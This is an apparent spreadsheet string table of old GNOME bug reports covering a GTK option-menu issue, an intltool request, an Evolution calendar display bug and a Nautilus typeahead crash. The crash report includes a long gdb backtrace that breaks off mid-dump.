  <si>
    <t>gtk_option_menu_set_menu doesn't handle being popped up</t>
  </si>
  <si>
    <t>gtk_option_menu_set_menu doesn't like being called when it's already popped
up.  Simple test-case included.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-61658</t>
  </si>
  <si>
    <t>RFE: Please make gnome-games use intltool</t>
  </si>
  <si>
    <t>Please consider using intltool (xml-i18n-tools) in gnome-games. This will
among other things make it much easier for translators to translate and
maintain translations for .desktop files.</t>
  </si>
  <si>
    <t>WEBSITE-361055</t>
  </si>
  <si>
    <t>Gnome Release Schedule events are shown like 23h 59m events</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Add http://www.gnome.org/start/unstable/schedule.ics as a new 'On the web' calendar.
Expected result:
Events on the calendar are shown as all day events.
Actual result:
Events are shown as 23h 59m events.
The calendar has 'Copy calendar contents for offline operation' marked and a refresh rate of 2 days.
The url shown in the properties window is webcal://www.gnome.org/start/unstable/schedule.ics I added the calendar with http://www.gnome.org/start/unstable/schedule.ics as the url.
I'm using Evolution 2.8.1 on Ubuntu Edgy (fully updated).</t>
  </si>
  <si>
    <t>NAUTILUS-133750</t>
  </si>
  <si>
    <t>Nautilus crash using  icon-view-style typeahead in list view.</t>
  </si>
  <si>
    <t>From:  
To: submit@bugs.gnome.org
X-Mailer: bug-buddy 2.5.2
Subject: Nautilus crash using  icon-view-style typeahead in list view.
Distribution: Fedora Core release 1 (Yarrow)
Package: nautilus
Severity: normal
Version: GNOME2.5.4 2.5.6
Gnome-Distributor: GNOME.Org
Synopsis: Nautilus crash using  icon-view-style typeahead in list view.
Bugzilla-Product: nautilus
Bugzilla-Component: general
Bugzilla-Version: 2.5.6
BugBuddy-GnomeVersion: 2.0 (2.5.3)
Description:
Description of the crash:
Nautilus crashed when I typed the letter 'a'.
Steps to reproduce the crash:
1.  Open a folder using the list view.
2.  Use the typeahead feature.
3.  Nautilus does not select items and it crashes.
Expected Results:
Item in list is selected.
How often does this happen?
Always.
Additional Information:
Debugging Information:
Backtrace was generated from '/cvs/gnome26/install/bin/nautilus'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1085192288 (LWP 8578)]
[New Thread 15551408 (LWP 1746)]
[New Thread 13048752 (LWP 1745)]
[New Thread 12262320 (LWP 8608)]
[New Thread 11942832 (LWP 8607)]
[New Thread 47901616 (LWP 8581)]
0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x00c2bb2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0x001b4160 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
#3  
#4  0x0086ece2 in g_object_get (_object=0x8788600 
    first_property_name=0x80c8c44 attribute) at gobject.c:1222
#5  0x080b1a96 in fm_list_model_get_value (tree_model=0x87888d0 
    iter=0x8788600 column=15 value=0xbff03cb0) at fm-list-model.c:296
#6  0x01162017 in gtk_tree_model_get_string_from_iter
(tree_model=0x865b4c8 
    iter=0x87888d0) at gtktreemodel.c:966
#7  0x080a4899 in select_matching_name (view=0x877eaa8 
    match_name=0x877f410 a) at fm-list-view.c:620
#8  0x080a4b15 in handle_typeahead (view=0x877eaa8 key_string=0x877f410
a)
    at fm-list-view.c:702
#9  0x080a4cac in key_press_callback (widget=0x88b4f88 event=0x8555860
    callback_data=0x877eaa8) at fm-list-view.c:770
#10 0x010bc54c in gtk_marshal_VOID__UINT_POINTER_UINT_UINT_ENUM (
    closure=0xbff03fc4 return_value=0xbff03e80 n_param_values=2 
    param_values=0x80a4bec invocation_hint=0xbff03ea8
marshal_data=0x0)
    at gtkmarshal.c:1054
#11 0x0086adde in g_closure_invoke (closure=0x87fb838 
    return_value=0xbff03e80 n_param_values=2 param_values=0xbff03fb0
    invocation_hint=0xbff03ea8) at gclosure.c:437
#12 0x0087caf6 in signal_emit_unlocked_R (node=0x83ea1d8 detail=0 
    instance=0x88b4f88 emission_return=0xbff03f50 
    instance_and_params=0xbff03fb0) at gsignal.c:2436
#13 0x0087ba29 in g_signal_emit_valist (instance=0x88b4f88 signal_id=0
    detail=0 var_args=0xbff04140
XAÃ°Â¿ %?\bhAÃ°Â¿mÃ\031\001XAÃ°Â¿)
    at gsignal.c:2205
#14 0x0087beb3 in g_signal_emit (instance=0x88b4f88 signal_id=71
detail=0)
    at gsignal.c:2239
#15 0x0119d3ac in gtk_widget_event (widget=0x8555860 event=0x88b4f88)
    at gtkwidget.c:3354
#16 0x011aa9b3 in gtk_window_frame_event (window=0x88b4f88
event=0x83f25a0)
    at gtkwindow.c:4063
#17 0x00d408ec in bonobo_window_key_press_event (widget=0x83f25a0 
    event=0x88b4f88) at bonobo-window.c:267
#18 0x010bc54c in gtk_marshal_VOID__UINT_POINTER_UINT_UINT_ENUM (
    closure=0xbff04424 return_value=0xbff042e0 n_param_values=2 
    param_values=0xd408b4 invocation_hint=0xbff04308
marshal_data=0xd408b4)
    at gtkmarshal.c:1054
#19 0x0086b072 in g_type_class_meta_marshal (closure=0x852abf0 
    return_value=0xbff042e0 n_param_values=2 param_values=0xbff04410
    invocation_hint=0xbff04308 marshal_data=0x3f000000) at
gclosure.c:514
#20 0x0086adde in g_closure_invoke (closure=0x852abf0 
    return_value=0xbff042e0 n_param_values=2 param_values=0xbff04410
    invocation_hint=0xbff04308) at gclosure.c:437
#21 0x0087c58f in signal_emit_unlocked_R (node=0x83ea1d8 detail=0 
    instance=0x84db2b8 emission_return=0xbff043b0 
    instance_and_params=0xbff04410) at gsignal.c:2474
#22 0x0087ba29 in g_signal_emit_valist (instance=0x84db2b8 signal_id=0
    detail=0 var_args=0xbff045a0
Â¸EÃ°Â¿ %?\bÃˆEÃ°Â¿mÃ\031\001Â¸EÃ°Â¿)
    at gsignal.c:2205
#23 0x0087beb3 in g_signal_emit (instance=0x84db2b8 signal_id=71
detail=0)
    at gsignal.c:2239
#24 0x0119d3ac in gtk_widget_event (widget=0x8555860 event=0x84db2b8)
    at gtkwidget.c:3354
#25 0x010bacea in gtk_quit_invoke_function (quitf=0x40) at
gtkmain.c:2240
#26 0x010b9b3f in gtk_main_do_event (event=0x84db2b8) at gtkmain.c:1415
#27 0x00292f8e in gdk_event_dispatch (source=0x3f000000 callback=0 
    user_data=0x0) at gdkevents-x11.c:2131
#28 0x008b5b9f in g_main_dispatch (context=0x840d2a8) at gmain.c:1752
#29 0x008b6b91 in g_main_context_dispatch (context=0x840d2a8) at
gmain.c:2300
#30 0x008b6eb6 in g_main_context_iterate (context=0x840d2a8 block=1 
    dispatch=1 self=0x83f0440) at gmain.c:2381
#31 0x008b754e in g_main_loop_run (loop=0x8527568) at gmain.c:2601
#32 0x010b94b3 in gtk_init_check (argc=0xc2c0b0 argv=0x0) at
gtkmain.c:915
#33 0x080725fc in main (argc=4 argv=0xbff04924) at nautilus-main.c:328
Thread 6 (Thread 47901616 (LWP 8581)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0424e6f7 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#2  0x008b79a3 in g_main_context_poll (context=0x851d6f8 timeout=-1 
    priority=2147483647 fds=0x86e1560 n_fds=8) at gmain.c:2699
	poll_func = 0x424e670 
#3  0x008b6e38 in g_main_context_iterate (context=0x851d6f8 block=1 
    dispatch=1 self=0x851d3a0) at gmain.c:2376
	got_ownership = -4
	max_priority = 2147483647
	timeout = -1
	some_ready = 8
	nfds = 8
	allocated_nfds = 13
	fds = (GPollFD *) 0x86e1560
#4  0x008b754e in g_main_loop_run (loop=0x8520898) at gmain.c:2601
	got_ownership = 10007664
	self = (GThread *) 0x851d3a0
#5  0x0047c586 in link_io_thread_fn (data=0x0) at linc.c:343
No locals.
#6  0x008cb618 in g_thread_create_proxy (data=0x851d3a0) at
gthread.c:601
No locals.
#7  0x00c257fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x04257aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread 11942832 (LWP 8607)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c28424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00631d96 in gnome_vfs_thread_pool_wait_for_work (state=0x8526988)
    at gnome-vfs-thread-pool.c:163
No locals.
#3  0x00631ddc in thread_entry (cast_to_state=0x8526988)
    at gnome-vfs-thread-pool.c:176
No locals.
#4  0x008cb618 in g_thread_create_proxy (data=0x8526a00) at
gthread.c:601
No locals.
#5  0x00c257fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x04257aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 12262320 (LWP 8608)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c28424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00631d96 in gnome_vfs_thread_pool_wait_for_work (state=0x8526c30)
    at gnome-vfs-thread-pool.c:163
No locals.
#3  0x00631ddc in thread_entry (cast_to_state=0x8526c30)
    at gnome-vfs-thread-pool.c:176
No locals.
#4  0x008cb618 in g_thread_create_proxy (data=0x8526ca8) at
gthread.c:601
No locals.
#5  0x00c257fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x04257aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 13048752 (LWP 1745)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c28424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00631d96 in gnome_vfs_thread_pool_wait_for_work (state=0x851ce80)
    at gnome-vfs-thread-pool.c:163
No locals.
#3  0x00631ddc in thread_entry (cast_to_state=0x851ce80)
    at gnome-vfs-thread-pool.c:176
No locals.
#4  0x008cb618 in g_thread_create_proxy (data=0x86295e8) at
gthread.c:601
No locals.
#5  0x00c257fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x04257aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 15551408 (LWP 1746)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c28424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00631d96 in gnome_vfs_thread_pool_wait_for_work (state=0x8670540)
    at gnome-vfs-thread-pool.c:163
No locals.
#3  0x00631ddc in thread_entry (cast_to_state=0x8670540)
    at gnome-vfs-thread-pool.c:176
No locals.
#4  0x008cb618 in g_thread_create_proxy (data=0x86705b8) at
gthread.c:601
No locals.
#5  0x00c257fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x04257aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1085192288 (LWP 8578)):
#0  0x0097fc32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c2bb2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x001b4160 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
	estatus = 141669040
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {0 8848168 8848152 8997772 3220191416 8930137
      3220191616 20 3220191432 9097885 141669040 138326084 0
9097865 
      1 139621320 139718984 9212214 7997873 3220191626 3220191976
      8894015 8999112 9470812 3220191496 9097925 7997873
3220191626 
      3220191520 9097865 138405160 134217728}} sa_flags =
-1074775660 
  sa_restorer = 0x1}
	pid = 0
#3  
No symbol table info available.
#4  0x0086ece2 in g_object_get (_object=0x8788600 
    first_property_name=0x80c8c44 attribute) at gobject.c:1222
	__r = 1056964608
#5  0x080b1a96 in fm_list_model_get_value (tree_model=0x87888d0 
    iter=0x8788600 column=15 value=0xbff03cb0) at fm-list-model.c:296
	nautilus_column = (NautilusColumn *) 0x8788600
	attribute = 0x8660f14 Ã°\016f\b
	file = (NautilusFile *) 0x8791870
	str = 0x3f000000 
	icon = (GdkPixbuf *) 0x87888d0
	tmp = (GdkPixbuf *) 0x8788600
	icon_size = 8999168
	zoom_level = 1056964608
	height = 142116352
	modifier = 0x8660f14 Ã°\016f\b
	emblem_icons = (GList *) 0x8788600
	parent_file = (NautilusFile *) 0x8788600
	emblems_to_ignore = (EelStringList *) 0x87888d0
#6  0x01162017 in gtk_tree_model_get_string_from_iter
(tree_model=0x865b4c8 
    iter=0x87888d0) at gtktreemodel.c:966
	path = (GtkTreePath *) 0x87888d0
	ret = (gchar *) 0x865b4c8 
#7  0x080a4899 in select_matching_name (view=0x877eaa8 
    match_name=0x877f410 a) at fm-list-view.c:620
	iter = {stamp = -1187342661 user_data = 0x84e1858 user_data2 = 0x0 
  user_data3 = 0x0}
	path = (GtkTreePath *) 0x865b4c8
	match_found = 140883144
	value = {g_type = 64 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	file_name = (const gchar *) 0x40 
#8  0x080a4b15 in handle_typeahead (view=0x877eaa8 key_string=0x877f410
a)
    at fm-list-view.c:702
	new_pattern = 0x877f410 a
	now = 1076182237593400
	time_delta = 275934871552
	key_string_length = 8999172
	index = 64
#9  0x080a4cac in key_press_callback (widget=0x88b4f88 event=0x8555860
    callback_data=0x877eaa8) at fm-list-view.c:770
	view = (FMDirectoryView *) 0x877eaa8
	button_event = {type = GDK_DELETE window = 0x0 send_event = 0 '\0' 
  time = 0 x = 0 y = 0 axes = 0x0 state = 0 button = 0 device =
0x0 
  x_root = 0 y_root = 0}
	handled = 0
#10 0x010bc54c in gtk_marshal_VOID__UINT_POINTER_UINT_UINT_ENUM (
    closure=0xbff03fc4 return_value=0xbff03e80 n_param_values=2 
    param_values=0x80a4bec invocation_hint=0xbff03ea8
marshal_data=0x0)
    at gtkmarshal.c:1054
	callback = 0x88b4f88
	data1 = 0xbff03fd0
	data2 = 0x3f000000
#11 0x0086adde in g_closure_invoke (closure=0x87fb838 
    return_value=0xbff03e80 n_param_values=2 param_values=0xbff03fb0
    invocation_hint=0xbff03ea8) at gclosure.c:437
	marshal = 0x10bc4b0
	marshal_data = 0x0
	in_marshal = 0
#12 0x0087caf6 in signal_emit_unlocked_R (node=0x83ea1d8 detail=0 
    instance=0x88b4f88 emission_return=0xbff03f50 
    instance_and_params=0xbff03fb0) at gsignal.c:2436
	tmp = (Handler *) 0xbff03ea8
	handler = (Handler *) 0x8628ae8
	accumulator = (SignalAccumulator *) 0x852ac90
	emission = {next = 0xbff04300 instance = 0x88b4f88 ihint = {
    signal_id = 71 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	handler_list = (Handler *) 0x8628ae8
	return_accu = (GValue *) 0xbff03e80
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 71
	max_sequential_handler_number = 21371
	return_value_altered = 0
#13 0x0087ba29 in g_signal_emit_valist (instance=0x88b4f88 signal_id=0
    detail=0 var_args=0xbff04140
XAÃ°Â¿ %?\bhAÃ°Â¿mÃ\031\001XAÃ°Â¿)
    at gsignal.c:2205
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	rtype = 1056964608
	instance_and_params = (GValue *) 0xbff03fb0
	stack_values = {{g_type = 140871600 data = {{v_int = 143347592 
        v_uint = 143347592 v_long = 143347592 v_ulong = 143347592 
        v_int64 = 143347592 v_uint64 = 143347592 v_float =
8.3844559e-34 
        v_double = 7.0823120621267506e-316 v_pointer = 0x88b4f88} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 138405160 data = {{v_int = 139810912 v_uint = 139810912
        v_long = 139810912 v_ulong = 139810912 v_int64 = 139810912 
        v_uint64 = 139810912 v_float = 6.42012403e-34 
        v_double = 6.9075768532933687e-316 v_pointer = 0x8555860} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3220193272 data = {{
        v_int = 1476845 v_uint = 1476845 v_long = 1476845 
        v_ulong = 1476845 v_int64 = 4296444141 v_uint64 = 4296444141
        v_float = 2.06950063e-39 v_double = 2.1227254493440047e-314 
        v_pointer = 0x1688ed} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = -4616118802633981952 
        v_uint64 = 13830625271075569664 v_float = 0 
        v_double = -1.0157241821289062 v_pointer = 0x0}}} {g_type =
1476821 
    data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 40676827806564353 v_uint64 = 40676827806564353 
        v_float = 1.40129846e-45 v_double = 5.8788667723924021e-306 
        v_pointer = 0x1} {v_int = -1074773976 v_uint = 3220193320 
        v_long = -1074773976 v_ulong = 3220193320 
        v_int64 = 39334761120940072 v_uint64 = 39334761120940072 
        v_float = -1.87695789 v_double = 4.9387995490278424e-306 
        v_pointer = 0xbff04028}}} {g_type = 138352104 data = {{v_int =
0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
-4616119077511888896 
        v_uint64 = 13830624996197662720 v_float = 0 
        v_double = -1.0156631469726562 v_pointer = 0x0} {v_int =
9158050 
        v_uint = 9158050 v_long = 9158050 v_ulong = 9158050 
        v_int64 = 4304125346 v_uint64 = 4304125346 v_float =
1.28331614e-38 
        v_double = 2.1265204688531687e-314 v_pointer = 0x8bbda2}}} {
    g_type = 255 data = {{v_int = 48 v_uint = 48 v_long = 48 v_ulong
= 48 
        v_int64 = 38367651524771888 v_uint64 = 38367651524771888 
        v_float = 6.72623263e-44 v_double = 4.3271955461733131e-306 
        v_pointer = 0x30} {v_int = -1074773976 v_uint = 3220193320 
        v_long = -1074773976 v_ulong = 3220193320 
        v_int64 = 54742144546521128 v_uint64 = 54742144546521128 
        v_float = -1.87695789 v_double = 5.2641803397788023e-305 
        v_pointer = 0xbff04028}}} {g_type = 3220193352 data = {{
        v_int = 8933837 v_uint = 8933837 v_long = 8933837 
        v_ulong = 8933837 v_int64 = 40686087764988365 
        v_uint64 = 40686087764988365 v_float = 1.25189721e-38 
        v_double = 5.8905788423808119e-306 v_pointer = 0x8851cd} {
        v_int = 140052552 v_uint = 140052552 v_long = 140052552 
        v_ulong = 140052552 v_int64 = 4435019848 v_uint64 =
4435019848 
        v_float = 6.53107967e-34 v_double = 2.1911909455208671e-314 
        v_pointer = 0x8590848}}} {g_type = 3758104578 data = {{
        v_int = 139810760 v_uint = 139810760 v_long = 139810760 
        v_ulong = 139810760 v_int64 = 594514149255763912 
        v_uint64 = 594514149255763912 v_float = 6.42005423e-34 
        v_double = 6.1096791090009387e-269 v_pointer = 0x85557c8} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 12396306408407041 v_uint64 = 12396306408407041 
        v_float = 1.40129846e-45 v_double = 7.7990305464168134e-308 
        v_pointer = 0x1}}} {g_type = 142695888 data = {{v_int =
142695792 
        v_uint = 142695792 v_long = 142695792 v_ulong = 142695792 
        v_int64 = -4616118733771809424 v_uint64 = 13830625339937742192
        v_float = 7.78587214e-34 v_double = -1.0157394726027995 
        v_pointer = 0x8815d70} {v_int = 2684245 v_uint = 2684245 
        v_long = 2684245 v_ulong = 2684245 v_int64 =
612874172236363093 
        v_uint64 = 612874172236363093 v_float = 3.7614284e-39 
        v_double = 1.0519256400601534e-267 v_pointer = 0x28f555}}} {
    g_type = 138421112 data = {{v_int = -1074773896 v_uint =
3220193400 
        v_long = -1074773896 v_ulong = 3220193400 
        v_int64 = 11528541551214712 v_uint64 = 11528541551214712 
        v_float = -1.87696743 v_double = 6.9415649372026831e-308 
        v_pointer = 0xbff04078} {v_int = 2886240 v_uint = 2886240 
        v_long = 2886240 v_ulong = 2886240 v_int64 =
612874172236565088 
        v_uint64 = 612874172236565088 v_float = 4.04448368e-39 
        v_double = 1.0519256401036219e-267 v_pointer = 0x2c0a60}}} {
    g_type = 3220193432 data = {{v_int = 8933165 v_uint = 8933165 
        v_long = 8933165 v_ulong = 8933165 v_int64 =
612874172242612013 
        v_uint64 = 612874172242612013 v_float = 1.25180304e-38 
        v_double = 1.0519256414048956e-267 v_pointer = 0x884f2d} {
        v_int = 138420240 v_uint = 138420240 v_long = 138420240 
        v_ulong = 138420240 v_int64 = -4616118596337131504 
        v_uint64 = 13830625477372420112 v_float = 5.78155876e-34 
        v_double = -1.0157699892315613 v_pointer = 0x8402010}}} {
    g_type = 8933837 data = {{v_int = 2886240 v_uint = 2886240 
        v_long = 2886240 v_ulong = 2886240 v_int64 =
612873759919704672 
        v_uint64 = 612873759919704672 v_float = 4.04448368e-39 
        v_double = 1.0518369111896594e-267 v_pointer = 0x2c0a60} {
        v_int = -1074773832 v_uint = 3220193464 v_long = -1074773832
        v_ulong = 3220193464 v_int64 = -2305825409512488776 
        v_uint64 = 16140918664197062840 v_float = -1.87697506 
        v_double = -2.6920409106580241e+154 v_pointer = 0xbff040b8}}}
{
    g_type = 142695888 data = {{v_int = 138418824 v_uint = 138418824
        v_long = 138418824 v_ulong = 138418824 v_int64 = 4433386120 
        v_uint64 = 4433386120 v_float = 5.78090857e-34 
        v_double = 2.1903837766414182e-314 v_pointer = 0x8401a88} {
        v_int = 8933837 v_uint = 8933837 v_long = 8933837 
        v_ulong = 8933837 v_int64 = 594507242817475021 
        v_uint64 = 594507242817475021 v_float = 1.25189721e-38 
        v_double = 6.100390124794349e-269 v_pointer = 0x8851cd}}} {
    g_type = 142695792 data = {{v_int = -1074773800 v_uint =
3220193496 
        v_long = -1074773800 v_ulong = 3220193496 
        v_int64 = 11819929312444632 v_uint64 = 11819929312444632 
        v_float = -1.87697887 v_double = 7.2294943020872739e-308 
        v_pointer = 0xbff040d8} {v_int = 138419504 v_uint = 138419504
        v_long = 138419504 v_ulong = 138419504 v_int64 =
594511091237657904 
        v_uint64 = 594511091237657904 v_float = 5.78122081e-34 
        v_double = 6.1055661522637642e-269 v_pointer = 0x8401d30}}} {
    g_type = 1 data = {{v_int = 2886240 v_uint = 2886240 v_long =
2886240 
        v_ulong = 2886240 v_int64 = 594511091102124640 
        v_uint64 = 594511091102124640 v_float = 4.04448368e-39 
        v_double = 6.1055659699749641e-269 v_pointer = 0x2c0a60} {
        v_int = 142695792 v_uint = 142695792 v_long = 142695792 
        v_ulong = 142695792 v_int64 = -4616118115296518800 
        v_uint64 = 13830625958413032816 v_float = 7.78587214e-34 
        v_double = -1.015876801704362 v_pointer = 0x8815d70}}} {
    g_type = 8933165 data = {{v_int = 142695792 v_uint = 142695792 
        v_long = 142695792 v_ulong = 142695792 v_int64 =
594511091241934192 
        v_uint64 = 594511091241934192 v_float = 7.78587214e-34 
        v_double = 6.1055661580152631e-269 v_pointer = 0x8815d70} {
        v_int = -1074773752 v_uint = 3220193544 v_long = -1074773752
        v_ulong = 3220193544 v_int64 = 11226777148997896 
        v_uint64 = 11226777148997896 v_float = -1.8769846 
        v_double = 6.6433820886563854e-308 v_pointer = 0xbff04108}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 0
	param_values = (GValue *) 0xbff03fc4
	i = 1
	n_params = 1
#14 0x0087beb3 in g_signal_emit (instance=0x88b4f88 signal_id=71
detail=0)
    at gsignal.c:2239
No locals.
#15 0x0119d3ac in gtk_widget_event (widget=0x8555860 event=0x88b4f88)
    at gtkwidget.c:3354
No locals.
#16 0x011aa9b3 in gtk_window_frame_event (window=0x88b4f88
event=0x83f25a0)
    at gtkwindow.c:4063
	rect = {x = 143347592 y = 139810912 width = -1074773592 
  height = 8934529}
#17 0x00d408ec in bonobo_window_key_press_event (widget=0x83f25a0 
    event=0x88b4f88) at bonobo-window.c:267
	handled = 1056964608
	sync = (BonoboUISyncKeys *) 0x3f000000
#18 0x010bc54c in gtk_marshal_VOID__UINT_POINTER_UINT_UINT_ENUM (
    closure=0xbff04424 return_value=0xbff042e0 n_param_values=2 
    param_values=0xd408b4 invocation_hint=0xbff04308
marshal_data=0xd408b4)
    at gtkmarshal.c:1054
	callback = 0x84db2b8
	data1 = 0x852abf0
	data2 = 0x3f000000
#19 0x0086b072 in g_type_class_meta_marshal (closure=0x852abf0 
    return_value=0xbff042e0 n_param_values=2 param_values=0xbff04410
    invocation_hint=0xbff04308 marshal_data=0x3f000000) at
gclosure.c:514
	class = (GTypeClass *) 0x40
	callback = 0x3f000000
#20 0x0086adde in g_closure_invoke (closure=0x852abf0 
    return_value=0xbff042e0 n_param_values=2 param_values=0xbff04410
    invocation_hint=0xbff04308) at gclosure.c:437
	marshal = 0x86b030 
	marshal_data = 0xcc
	in_marshal = 0
#21 0x0087c58f in signal_emit_unlocked_R (node=0x83ea1d8 detail=0 
    instance=0x84db2b8 emission_return=0xbff043b0 
    instance_and_params=0xbff04410) at gsignal.c:2474
	tmp = (Handler *) 0xbff04308
	handler = (Handler *) 0x852abf0
	accumulator = (SignalAccumulator *) 0x852ac90
	emission = {next = 0x0 instance = 0x84db2b8 ihint = {signal_id = 71
    detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN 
  chain_type = 139676208}
	handler_list = (Handler *) 0x873ab78
	return_accu = (GValue *) 0xbff042e0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 71
	max_sequential_handler_number = 21371
	return_value_altered = 1
#22 0x0087ba29 in g_signal_emit_valist (instance=0x84db2b8 signal_id=0
    detail=0 var_args=0xbff045a0
Â¸EÃ°Â¿ %?\bÃˆEÃ°Â¿mÃ\031\001Â¸EÃ°Â¿)
    at gsignal.c:2205
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	rtype = 1056964608
	instance_and_params = (GValue *) 0xbff04410
	stack_values = {{g_type = 139676208 data = {{v_int = 139309752 
        v_uint = 139309752 v_long = 139309752 v_ulong = 139309752 
        v_int64 = 139309752 v_uint64 = 139309752 v_float =
6.19000264e-34 
        v_double = 6.8828162593863887e-316 v_pointer = 0x84db2b8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 138405160 data = {{v_int = 139810912 v_uint = 139810912
        v_long = 139810912 v_ulong = 139810912 v_int64 = 139810912 
        v_uint64 = 139810912 v_float = 6.42012403e-34 
        v_double = 6.9075768532933687e-316 v_pointer = 0x8555860} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3220194456 data = {{
        v_int = 8933165 v_uint = 8933165 v_long = 8933165 
        v_ulong = 8933165 v_int64 = -4616114370218799315 
        v_uint64 = 13830629703490752301 v_float = 1.25180304e-38 
        v_double = -1.0167083760069986 v_pointer = 0x884f2d} {v_int =
1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1
        v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 
        v_pointer = 0x1}}} {g_type = 3220194412 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
-4616114370227732480 
        v_uint64 = 13830629703481819136 v_float = 0 
        v_double = -1.0167083740234375 v_pointer = 0x0} {v_int = 1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 =
-2305842687091146751 
        v_uint64 = 16140901386618404865 v_float = 1.40129846e-45 
        v_double = -2.6817533862194514e+154 v_pointer = 0x1}}} {
    g_type = 138419504 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 594115868208660481 
        v_uint64 = 594115868208660481 v_float = 1.40129846e-45 
        v_double = 5.8156142012861356e-269 v_pointer = 0x1} {
